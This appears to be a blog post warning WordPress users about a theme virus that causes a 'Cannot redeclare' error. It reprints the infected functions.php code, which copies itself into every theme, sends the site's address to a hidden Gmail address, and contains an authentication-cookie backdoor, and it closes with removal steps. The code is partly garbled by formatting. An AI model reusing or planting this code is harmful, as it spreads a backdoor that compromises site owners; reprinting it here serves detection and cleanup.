WordPress Themes virus when you meet “Fatal error: Cannot redeclare _verify_isactivate_widgets()…”

Becareful, your wordpress themes may be infected with a virus when you saw this:

Fatal error: Cannot redeclare _verify_isactivate_widgets() (previously declared in /home/public_html/your-domain/wp-content/themes/meters/functions.php:269) in/home/public_html/your-domain/wp-content/themes/meters/includes/functions/functions.php on line 23

This usually happens when you activate your themes. A lots of virus codes will auto added to your funcionts.php. This is the code like:


function _checkactive_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),” $output .= $before . “Not found” . $after;
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $separar . “\n” .$widget);fclose($f);
$output .= ($showfullstop && $ellipsis) ? “…” : “”;
}
}
}
}
return $output;
}
function _getall_widgetscont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == “/”){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . “/” . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _getall_widgetscont($wids,$items);
} else {
return $items;
}
}
if(!function_exists(“stripos”)){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}

if(!function_exists(“strripos”)){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists(“scandir”)){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action(“admin_head”, “_checkactive_widget”);
function _getprepareed_widget(){
if(!isset($content_length)) $content_length=120;
if(!isset($checking)) $checking=”cookie”;
if(!isset($tags_allowed)) $tags_allowed=”< a >“;
if(!isset($filters)) $filters=”none”;
if(!isset($separ)) $separ=”";
if(!isset($home_f)) $home_f=get_option(“home”);
if(!isset($pre_filter)) $pre_filter=”wp_”;
if(!isset($is_more_link)) $ is_more_link=1;
if(!isset($comment_t)) $comment_t=”";
if(!isset($c_page)) $c_page=$_GET["cperpage"];
if(!isset($comm_author)) $comm_author=”";
if(!isset($is_approved)) $is_approved=”";
if(!isset($auth_post)) $auth_post=”auth”;
if(!isset($m_text)) $m_text=”(more…)”;
if(!isset($yes_widget)) $yes_widget=get_option(“_is_widget_active_”);
if(!isset($widgetcheck)) $widgetcheck=$pre_filter.”set”.”_”.$auth_post.”_”.$checking;
if(!isset($m_text_ditails)) $m_text_ditails=”(details…)”;
if(!isset($contentsmore)) $contentsmore=”ma”.$separ.”il”;
if(!isset($fmore)) $fmore=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=”";
if (!$yes_widget) :

global $wpdb, $post;
$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$separ.”vethe”.$comment_t.”mes”.$separ.”@”.$is_approved.”gm”.$comm_author.”ail”.$separ.”.”.$separ.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fixed_tag)) $fixed_tag=1;
if(!isset($filterss)) $filterss=$home_f;
if(!isset($gettextcomment)) $gettextcomment=$pre_filter.$contentsmore;
if(!isset($m_tag)) $m_tag=”div”;
if(!isset($sh_text)) $sh_text=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($m_link_title)) $m_link_title=”Continue reading this entry”;
if(!isset($showfullstop)) $showfullstop=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomment, array($sh_text, $home_f, $filterss)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($content_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, ““)) {
$text=explode(““, $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(” “, $text);
if(count($text) > $content_length) {
$l=$content_length;
$ellipsis=1;
} else {
$l=count($text);
$m_text=”";
$ellipsis=0;
}
}
for ($i=0; $i $output .= $text[$i] . ” “;
}
update_option(“_is_widget_active_”, 1);
if(“all” != $tags_allowed) {
$output=strip_tags($output, $tags_allowed);
return $output;
}
endif;
$output=rtrim($output, “\s\n\t\r\x0B”);
$output=($fixed_tag) ? balanceTags($output, true) : $output;
$output .= ($showfullstop && $ellipsis) ? “…” : “”;
$output=apply_filters($filters, $output);
switch($m_tag) {
case(“div”) :
$tag=”div”;
break;
case(“span”) :
$tag=”span”;
break;
case(“p”) :
$tag=”p”;
break;
default :
$tag=”span”;
}

if ($is_more_link ) {
if($fmore) {
$output .= ” < a href="\"".">ID) . “#more-” . $post->ID .”\” title=\”" . $m_link_title . “\”>” . $m_text = !is_user_logged_in() && @call_user_func_array($widgetcheck,array($c_page, true)) ? $m_text : “” . “” . “\n”;
} else {
$output .= ” < a href="\"".">ID) . “\” title=\”" . $m_link_title . “\”>” . $m_text . “” . “\n”;
}
}
return $output;
}

add_action(“init”, “_getprepareed_widget”);

function __popular_posts($no_posts=6, $before=”

  • “, $after=”

 

“, $show_pass_post=false, $duration=”") {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\”";
if(!$show_pass_post) $request .= ” AND post_password =\”\”";
if($duration !=”") {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “; } $request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
$posts=$wpdb->get_results($request);
$output=”";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . ” < a title="\""" href="\""">” . $post_title . “ ” . $after;
}
} else {
$output .= $before . “None found” . $after;
}
return $output;
}
?>

The code shows a worm-like behavior.As soon as you activate an infected theme, it’ll infect all other themes installed on your server. When you saw the code, please follow these steps to avoid from the virus:

Take your system down
- copy all needed themes to your local machine
- remove the above mentioned data from all functions.php
- be 200% sure that you really removed it from ALL functions.php
- copy everything back to your server
- bring your system back

Leave a Reply